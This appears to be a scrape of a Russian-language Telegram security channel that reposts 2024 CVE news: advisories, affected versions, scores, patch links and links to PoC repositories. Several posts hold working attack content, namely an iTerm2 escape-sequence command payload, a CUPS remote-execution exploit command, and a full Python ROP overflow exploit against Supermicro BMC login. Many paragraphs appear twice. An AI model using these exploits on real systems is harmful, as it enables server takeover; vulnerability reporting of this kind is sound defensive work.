Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
PoC for:
— CVE-2024-38094
— CVE-2024-38024
— CVE-2024-38023
🔗 Source:
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
#sharepoint #poc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
#CVE-2024-21007 Weblogic Server RCE & #CVE-2024-21006 unauthorized access to critical data
├ Published: 2024-04-16
├ Base Score: 7.5 (HIGH)
├ Affected Versions: 12.2.1.4.0, 14.1.1.0.0
https://www.oracle.com/security-alerts/cpuapr2024.html
https://securityboulevard.com/2024/04/weblogic-t3-iiop-information-disclosure-vulnerability-cve-2024-21006-cve-2024-21007/?utm_source=dlvr.it&utm_medium=twitter
├ Published: 2024-04-16
├ Base Score: 7.5 (HIGH)
├ Affected Versions: 12.2.1.4.0, 14.1.1.0.0
https://www.oracle.com/security-alerts/cpuapr2024.html
https://securityboulevard.com/2024/04/weblogic-t3-iiop-information-disclosure-vulnerability-cve-2024-21006-cve-2024-21007/?utm_source=dlvr.it&utm_medium=twitter
This media is not supported in your browser
VIEW IN TELEGRAM
PoC: #CVE-2024-38396 & #CVE-2024-38395 for iTerm2 arbitrary command execution
Вы можете выполнять произвольные команды, просто управляя данными, выводимыми в консоль. Вводимые в консоль команды работают в обновленной на текущий момент версии Build 3.5.3.
Вы можете выполнять произвольные команды, просто управляя данными, выводимыми в консоль. Вводимые в консоль команды работают в обновленной на текущий момент версии Build 3.5.3.
]2;s&open -aCalculator&[21t P1000p%session-changed s
#CVE-2024-22274: Privilege Escalation: #VMware #vCenter Server Authenticated #RCE
https://github.com/l0n3m4n/CVE-2024-22274-RCE
https://github.com/l0n3m4n/CVE-2024-22274-RCE
Apache Superset - CVE-2024-34693.pdf
2.2 MB
#CVE-2024-34693 Apache Superset Arbitrary File Read Vulnerability
Затронутые версии:
Apache Superset до версии 3.1.3; Apache Superset 4.0.0 до версии 4.0.1
Описание: Уязвимость Improper Input Validation в Apache Superset позволяет аутентифицированному злоумышленнику создать соединение MariaDB с включенным local_infile. Если и сервер MariaDB (по умолчанию выключен), и локальный клиент mysql на веб-сервере настроены на разрешение local infile, злоумышленник может выполнить определенную SQL-команду MySQL/MariaDB, способную читать файлы с сервера и вставлять их содержимое в таблицу базы данных MariaDB. Пользователям рекомендуется обновиться до версии 4.0.1 или 3.1.3, в которых проблема устранена.
Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/exposed-panels/superset-login.yaml
Затронутые версии:
Apache Superset до версии 3.1.3; Apache Superset 4.0.0 до версии 4.0.1
Описание: Уязвимость Improper Input Validation в Apache Superset позволяет аутентифицированному злоумышленнику создать соединение MariaDB с включенным local_infile. Если и сервер MariaDB (по умолчанию выключен), и локальный клиент mysql на веб-сервере настроены на разрешение local infile, злоумышленник может выполнить определенную SQL-команду MySQL/MariaDB, способную читать файлы с сервера и вставлять их содержимое в таблицу базы данных MariaDB. Пользователям рекомендуется обновиться до версии 4.0.1 или 3.1.3, в которых проблема устранена.
Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/exposed-panels/superset-login.yaml
Исследователи Fortinet FortiGuard Labs https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed кампанию, нацеленную на Испанию, Таиланд и США с использованием уязвимости CVE-2024-21412 (оценка CVSS: 8,1).
Исправленная уязвимость безопасности в Microsoft Defender SmartScreen использовалась для распространения вредоносных программ таких как ACR Stealer, Lumma и Meduza.
Уязвимость высокой степени серьезности позволяет злоумышленнику обойти защиту SmartScreen и доставить вредоносные вредоносные нагрузки. Microsoft устранила ее еще в феврале 2024 года.
В ходе наблюдаемых атак злоумышленники заманивают жертву, заставляя ее пройти по созданной ссылке на URL-файл, предназначенный для загрузки LNK-файла. Затем LNK-файл загружает исполняемый файл, содержащий скрипт (HTML-приложения). Файл HTA служит каналом для декодирования и расшифровки кода PowerShell, отвечающего за извлечение поддельного PDF-файла и инжектора шелл-кода.
Он, в свою очередь, приводит к развертыванию Meduza Stealer или Hijack Loader, которые впоследствии запускают CR Stealer или Lumma.
Полезные forensics artifacts для #CVE_2024_21412 : .url файлы в WebDAV папке для детекта:
Исправленная уязвимость безопасности в Microsoft Defender SmartScreen использовалась для распространения вредоносных программ таких как ACR Stealer, Lumma и Meduza.
Уязвимость высокой степени серьезности позволяет злоумышленнику обойти защиту SmartScreen и доставить вредоносные вредоносные нагрузки. Microsoft устранила ее еще в феврале 2024 года.
В ходе наблюдаемых атак злоумышленники заманивают жертву, заставляя ее пройти по созданной ссылке на URL-файл, предназначенный для загрузки LNK-файла. Затем LNK-файл загружает исполняемый файл, содержащий скрипт (HTML-приложения). Файл HTA служит каналом для декодирования и расшифровки кода PowerShell, отвечающего за извлечение поддельного PDF-файла и инжектора шелл-кода.
Он, в свою очередь, приводит к развертыванию Meduza Stealer или Hijack Loader, которые впоследствии запускают CR Stealer или Lumma.
Полезные forensics artifacts для #CVE_2024_21412 : .url файлы в WebDAV папке для детекта:
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\*.url
Снова Apache #OFBiz ERP #RCE #CVE-2024-38856
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
#Kibana 8.14.2 / 7.17.23 arbitrary code execution via prototype pollution (ESA-2024-22)
Эта проблема затрагивает экземпляры Kibana, запущенные на Elastic Cloud, но RCE ограничено внутри контейнера Kibana Docker. Дальнейшая эксплуатация, например выход из контейнера, предотвращается с помощью seccomp-bpf и профилей AppArmor.
Affected Versions:
Kibana 8.x < versions prior to 8.14.2 and Kibana 7.x < versions prior to 7.17.23
Solutions and Mitigations:
Users should upgrade to version 8.14.2 and 7.17.23.
Severity: CVSSv3: 9.9(Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 108
CVE ID: #CVE-2024-37287
https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424
Эта проблема затрагивает экземпляры Kibana, запущенные на Elastic Cloud, но RCE ограничено внутри контейнера Kibana Docker. Дальнейшая эксплуатация, например выход из контейнера, предотвращается с помощью seccomp-bpf и профилей AppArmor.
Affected Versions:
Kibana 8.x < versions prior to 8.14.2 and Kibana 7.x < versions prior to 7.17.23
Solutions and Mitigations:
Users should upgrade to version 8.14.2 and 7.17.23.
Severity: CVSSv3: 9.9(Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 108
CVE ID: #CVE-2024-37287
https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424
#Roundcube #CVE-2024-42009 и #CVE-2024-42008 - обе ошибки XSS. Первая позволяет удаленному злоумышленнику украсть и отправить электронную почту жертвы через поддельное сообщение, вторая - через вредоносное вложение.
Severity: еще не выдана оценка
Третяя #CVE-2024-42010 - позволяет использовать недостаточно отфильтрованные последовательности маркеров Cascading Style Sheets (CSS) в отрисованных почтовых сообщениях, что позволяет удаленному злоумышленнику получить конфиденциальную информацию.
Severity: High 7.5/ 10
https://github.com/roundcube/roundcubemail/releases
Кто юзает обновляйтесь
Severity: еще не выдана оценка
Третяя #CVE-2024-42010 - позволяет использовать недостаточно отфильтрованные последовательности маркеров Cascading Style Sheets (CSS) в отрисованных почтовых сообщениях, что позволяет удаленному злоумышленнику получить конфиденциальную информацию.
Severity: High 7.5/ 10
https://github.com/roundcube/roundcubemail/releases
Кто юзает обновляйтесь
Снова Jenkins
#CVE-2024-43044 | #CVE-2024-43045 Critical Jenkins Vulnerability Exposes Servers to RCE Attacks
Jenkins 2.470, LTS 2.452.3 и более ранние версии позволяют процессам агента читать произвольные файлы из файловой системы контроллера Jenkins с помощью метода `
CVSS Score : 9.1
Обновите до версии LTS 2.452.3 и 2.470 и выше
https://www.jenkins.io/security/advisory/2024-08-07/
https://github.com/advisories/GHSA-h856-ffvv-xvr4
#CVE-2024-43044 | #CVE-2024-43045 Critical Jenkins Vulnerability Exposes Servers to RCE Attacks
Jenkins 2.470, LTS 2.452.3 и более ранние версии позволяют процессам агента читать произвольные файлы из файловой системы контроллера Jenkins с помощью метода `
ClassLoaderProxy#fetchJar
` в библиотеке Remoting.CVSS Score : 9.1
Обновите до версии LTS 2.452.3 и 2.470 и выше
https://www.jenkins.io/security/advisory/2024-08-07/
https://github.com/advisories/GHSA-h856-ffvv-xvr4
#CVE-2024-22116 Critical RCE в Zabbix Monitoring Solution
An administrator with restricted permissions can exploit the lack of default escaping for script parameters.
CVSS 9.9
The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2
Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3
https://support.zabbix.com/browse/ZBX-25016
An administrator with restricted permissions can exploit the lack of default escaping for script parameters.
CVSS 9.9
The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2
Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3
https://support.zabbix.com/browse/ZBX-25016
Критическая уязвимость TCP/IP #CVE-2024-38063 от 13 августа 2024 обзавелась первым PoC'ом. Пусть это и приводит к крашу ipv6 через flask питона, но уже есть над чем работать.
Форкнул себе на всякий случай
https://github.com/cleverg0d/CVE-2024-38063-POC
Форкнул себе на всякий случай
https://github.com/cleverg0d/CVE-2024-38063-POC
Уязвимость #CVE-2024-8698 в #Keycloak подвергает риску аутентификацию SAML (keycloak-saml-core)
CVSS v3: 7.7
https://nvd.nist.gov/vuln/detail/CVE-2024-8698
Патч вышел https://github.com/keycloak/keycloak/releases/tag/25.0.6
CVSS v3: 7.7
https://nvd.nist.gov/vuln/detail/CVE-2024-8698
Патч вышел https://github.com/keycloak/keycloak/releases/tag/25.0.6
В ядре Linux найден #LPE #CVE-2024-26808 и #CVE-2024-1085 -
Уязвимости вызваны обращением к уже освобождённой области памяти в функциях nft_chain_filter и nft_setelem_catchall_deactivate в подсистеме netfilter и позволяют добиться выполнения кода с правами root.
Для проведения атаки требуется наличие доступа к nftables, который можно получить при наличии прав CAP_NET_ADMIN в любом пространстве имён идентификаторов пользователей (user namespace) или сетевом пространстве имён (network namespace), предоставляемых, например, в изолированных контейнерах.
Устранены в обновлениях ядер 5.10.210, 5.15.149, 6.1.76, 6.6.15, 6.7.3 и 6.8, и уже в основных дистрибутивах (Debian, Ubuntu, RHEL, SUSE, Fedora).
PoC: https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36
Уязвимости вызваны обращением к уже освобождённой области памяти в функциях nft_chain_filter и nft_setelem_catchall_deactivate в подсистеме netfilter и позволяют добиться выполнения кода с правами root.
Для проведения атаки требуется наличие доступа к nftables, который можно получить при наличии прав CAP_NET_ADMIN в любом пространстве имён идентификаторов пользователей (user namespace) или сетевом пространстве имён (network namespace), предоставляемых, например, в изолированных контейнерах.
Устранены в обновлениях ядер 5.10.210, 5.15.149, 6.1.76, 6.6.15, 6.7.3 и 6.8, и уже в основных дистрибутивах (Debian, Ubuntu, RHEL, SUSE, Fedora).
PoC: https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
Please open Telegram to view this post
VIEW IN TELEGRAM
Мы знаем как админы не любят менять заводские пароли к админкам сереров типа iDrac, iLO и др. И вот вишинка #CVE-2024-36435
с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6).
Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC.
https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw
PoC:
с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6).
Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC.
https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw
PoC:
# CVE-2024-36435 – Buffer overflow vulnerability in Supermicro BMC IPMI firmware due to unchecked length of user-supplied value
import base64
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# set target and command values
target = "https://192.168.10.53:443/cgi/login.cgi"
command = "touch /tmp/BRLY"
libc_base = 0x76283000 # we try to guess
gadget_1_offset = 0x000D8874 # pop {r0, r1, r2, r3, fp, pc};
gadget_2_offset = 0x001026D4 # mov r0, sp; blx r3;
system_offset = 0x0003C4D4
print(f"Target: {target}")
print(f"Command: {command}")
print()
print(f"libc_base: {libc_base:#x}")
print(f"gadget_1_offset: {gadget_1_offset:#x}")
print(f"gadget_2_offset: {gadget_2_offset:#x}")
print(f"system_offset: {system_offset:#x}")
print()
payload = base64.b64encode(
b"\x00" * 456
+ int.to_bytes(libc_base + gadget_1_offset, 4, "little") # gadget_1
+ b"\x00" * 12
+ int.to_bytes(libc_base + system_offset, 4, "little") # system
+ b"\x00" * 4
+ int.to_bytes(libc_base + gadget_2_offset, 4, "little") # gadget_2
+ command.encode()
).decode()
data = f"name={payload}&pwd=&check=1"
print("Sending requests...")
i = 0
while True:
print(f"Request: '{i}'")
r = requests.post(target, data=data, verify=False)
i += 1
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
An in-depth look at CVE-2024-30090, a vulnerability in Kernel Streaming, allowing privilege escalation via malformed IOCTL requests. By leveraging KS Event mishandling during 32-bit to 64-bit conversions, can exploit the bug pattern to gain arbitrary kernel mode access.
🔗 Research:
Proxying to Kernel - Part I
Proxying to Kernel - Part II
🔗 Source:
https://github.com/Dor00tkit/CVE-2024-30090
#windows #streaming #kernel #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Критическая уязвимость #CVE-2024-21216 в Oracle #WebLogic Server - Позволяет неаутентифицированному злоумышленнику, имеющему доступ к сети через T3 и IIOP привести к полному захвату сервера.
CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0
https://github.com/advisories/GHSA-r389-865g-hcg3
CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0
https://github.com/advisories/GHSA-r389-865g-hcg3
This media is not supported in your browser
VIEW IN TELEGRAM
🩸 Критическая уязвимость RCE в FortiManager 🩸
🚨 #CVE-2024-47575 — Уязвимость удалённого выполнения кода (RCE) в FortiManager, позволяющая неаутентифицированному злоумышленнику выполнять произвольные команды через специально сформированные запросы (также известна как FortiJump).
🔴 Уязвимые версии:
• FortiManager 7.6.0
• FortiManager 7.4.0 - 7.4.4
• FortiManager 7.2.0 - 7.2.7
• FortiManager 7.0.0 - 7.0.12
• FortiManager 6.4.0 - 6.4.14
• FortiManager 6.2.0 - 6.2.12
• FortiManager Cloud: Версии от 6.4.1 до 7.4.4
💡 Детали: PoC продают за 147$, в гитхабе куча селлеров.
🔗 Подробнее от Fortinet
🔗 Аналитика от Mandiant
🚨 #CVE-2024-47575 — Уязвимость удалённого выполнения кода (RCE) в FortiManager, позволяющая неаутентифицированному злоумышленнику выполнять произвольные команды через специально сформированные запросы (также известна как FortiJump).
🔴 Уязвимые версии:
• FortiManager 7.6.0
• FortiManager 7.4.0 - 7.4.4
• FortiManager 7.2.0 - 7.2.7
• FortiManager 7.0.0 - 7.0.12
• FortiManager 6.4.0 - 6.4.14
• FortiManager 6.2.0 - 6.2.12
• FortiManager Cloud: Версии от 6.4.1 до 7.4.4
💡 Детали: PoC продают за 147$, в гитхабе куча селлеров.
🔗 Подробнее от Fortinet
🔗 Аналитика от Mandiant